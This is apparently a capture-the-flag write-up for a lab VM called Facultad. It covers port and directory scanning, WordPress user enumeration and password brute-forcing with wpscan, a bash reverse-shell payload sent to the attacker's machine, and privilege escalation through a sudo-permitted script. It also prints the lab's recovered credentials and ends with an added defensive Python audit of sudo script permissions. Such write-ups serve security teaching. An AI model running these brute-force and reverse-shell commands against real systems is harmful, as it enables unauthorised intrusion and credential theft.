Facultad

Information Gathering

192.168.100.57

Port Scan

╭─root@LAPTOP-O235O5EH /opt/CVE
╰─# rustscan -a 192.168.100.57 2 ↵
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.57:22
Open 192.168.100.57:80
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-30 16:58 +0800
Initiating ARP Ping Scan at 16:58
Scanning 192.168.100.57 [1 port]
Completed ARP Ping Scan at 16:58, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:58
Completed Parallel DNS resolution of 1 host. at 16:58, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 16:58
Scanning 192.168.100.57 [2 ports]
Discovered open port 22/tcp on 192.168.100.57
Discovered open port 80/tcp on 192.168.100.57
Completed SYN Stealth Scan at 16:58, 0.01s elapsed (2 total ports)
Nmap scan report for 192.168.100.57
Host is up, received arp-response (0.00068s latency).
Scanned at 2026-03-30 16:58:38 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:A9:9E:C0 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Enumeration

Directory Scan

╭─root@LAPTOP-O235O5EH /opt/CVE
╰─# gobuster dir -u http://192.168.100.57/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.100.57/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: zip,db,bak,php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 4651]
images (Status: 301) [Size: 317] [--> http://192.168.100.57/images/]
education (Status: 301) [Size: 320] [--> http://192.168.100.57/education/]
server-status (Status: 403) [Size: 279]
Progress: 1543906 / 1543906 (100.00%)
===============================================================
Finished
===============================================================

/education is a site built with WordPress.

The hostname needs to be added to the hosts file:

192.168.100.57 facultad.thl

WPScan

Enumerate WordPress users and vulnerable plugins:

wpscan --url http://192.168.100.57/education/ --enumerate u,vp

Username found: facultad

Brute-force the user's password:

wpscan --url http://192.168.100.57/education/ --passwords /usr/share/wordlists/rockyou.txt --usernames facultad

facultad:asdfghjkl

Log in to the admin dashboard at http://facultad.thl/education/wp-login.php

Files can be uploaded.

Reverse shell

?cmd=bash -c 'exec bash -i %26>/dev/tcp/192.168.100.46/8888 <%261'

Privilege Escalation

www -> vivian

There is an image in /var/www/html/images/; download it for analysis.

Here the steghide feature of the 随波逐流 tool is used.

Hola Gabri,
se me ha olvidado la contraseña creo que te la pasé y la tienes en tu correo.
Vivian

The note hints that the password is in the mail:

/var/mail/gabri/.password_vivian.bf

The file is Brainfuck-encoded.

Decode it with an online tool: https://ctfever.uniiem.com/tools/brain-fuck

Login credentials: vivian:lapatrona2025

vivian -> root

$ sudo -l
sudo: unable to resolve host TheHackersLabs-facultad.thl: Nombre o servicio desconocido
Matching Defaults entries for vivian on TheHackersLabs-facultad:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User vivian may run the following commands on TheHackersLabs-facultad:
(ALL) NOPASSWD: /opt/vivian/script.sh

script.sh can be used for privilege escalation.

$ cat /opt/vivian/script.sh
#!/bin/bash
echo "Ejecutado como vivian para mis alumnos"

The script's owner and group are both vivian, yet it can be run as root via sudo.
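
Added example (not part of the original write-up): a defender-side audit for the misconfiguration described above, where a NOPASSWD sudo rule points at a script that an unprivileged account owns. It parses `sudo -l` output and lists every path component a non-root account could modify; the names `sudo_commands`, `audit` and `SAMPLE_SUDO_L` are chosen here for illustration.

```python
import os
import re
import stat

# Constructed sample: the rule `sudo -l` prints for vivian in this write-up.
SAMPLE_SUDO_L = """\
User vivian may run the following commands on TheHackersLabs-facultad:
    (ALL) NOPASSWD: /opt/vivian/script.sh
"""
# "(runas) TAG: /path args, /path2" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(/.*)$")

def sudo_commands(sudo_l_output):
    """Return (runas, tags, path) for each command path in `sudo -l` output."""
    found = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        for cmd in filter(str.strip, m.group(3).split(",")):
            found.append((m.group(1), m.group(2).strip(), cmd.split()[0]))
    return found

def audit(path, stat_fn=os.stat, trusted_uids=frozenset({0})):
    """List reasons a non-root account could replace what sudo will execute."""
    # Checks the target and each parent directory up to /; stat_fn is injectable.
    reasons, current = [], os.path.normpath(path)
    while True:
        try:
            st = stat_fn(current)
        except FileNotFoundError:
            reasons.append(f"{current}: missing")
        else:
            sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
            if st.st_uid not in trusted_uids:
                reasons.append(f"{current}: owned by uid {st.st_uid}")
            if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
                reasons.append(f"{current}: writable by gid {st.st_gid}")
            if st.st_mode & stat.S_IWOTH and not sticky_dir:
                reasons.append(f"{current}: world-writable")
        parent = os.path.dirname(current)
        if parent == current:
            return reasons
        current = parent

if __name__ == "__main__":
    for runas, tags, path in sudo_commands(SAMPLE_SUDO_L):
        print(path, tags, audit(path) or "ok")
```

An empty list means the target and every directory above it are root-owned and not writable by other accounts, which is the state a sudo-permitted script should be in.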
